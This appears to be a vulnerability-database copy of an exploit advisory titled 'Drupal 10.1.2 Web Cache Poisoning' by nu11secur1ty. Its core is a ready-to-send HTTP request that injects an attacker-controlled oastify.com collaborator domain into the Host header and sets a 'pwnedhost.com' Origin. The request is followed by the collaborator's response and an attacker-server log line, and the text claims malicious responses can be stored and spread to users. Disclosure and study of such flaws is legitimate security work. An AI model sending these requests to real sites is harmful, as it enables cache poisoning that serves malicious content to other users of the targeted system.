Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Drupal 10.1.2 Web Cache Poisoning

🗓️ 08 Sep 2023 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 317 Views

Drupal 10.1.2 Web Cache Poisoning allows server-side HTTP requests to arbitrary domains. Malicious response can be stored, posing a risk to users by spreading a malicious URL

Code
`## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction  
## Author: nu11secur1ty  
## Date: 08/30/2023  
## Vendor: https://www.drupal.org/  
## Software: https://www.drupal.org/download  
## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http  
  
## Description:  
It is possible to induce the application to perform server-side HTTP  
requests to arbitrary domains.  
The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was  
submitted in the HTTP Host header.  
The application performed an HTTP request to the specified domain. For  
the second test, the attacker stored a response  
on the server with malicious content. This can be bad for a lot of  
users of this system if the attacker spreads a malicious URL  
and sends it by email etc. By using a redirect exploit.  
  
STATUS: HIGH-Vulnerability  
  
[+]Exploit:  
```GET  
GET /drupal/web/?psp4hw87ev=1 HTTP/1.1  
Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com  
Accept-Encoding: gzip, deflate, psp4hw87ev  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,  
text/psp4hw87ev  
Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111  
Safari/537.36 psp4hw87ev  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Origin: https://psp4hw87ev.pwnedhost.com  
```  
[+]Response from Burpcollaborator server:  
```HTTP  
HTTP/1.1 200 OK  
Server: Burp Collaborator https://burpcollaborator.net/  
X-Collaborator-Version: 4  
Content-Type: text/html  
Content-Length: 62  
  
<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>  
```  
  
[+]Response from Attacker server  
```HTTP  
192.168.100.45 - - [30/Aug/2023 05:52:56] "GET  
/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)  
  
## Time spend:  
03:35:00  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Sep 2023 00:00Current
7.1High risk
Vulners AI Score7.1
drupalweb cache poisoningserver-side httpmalicious url
317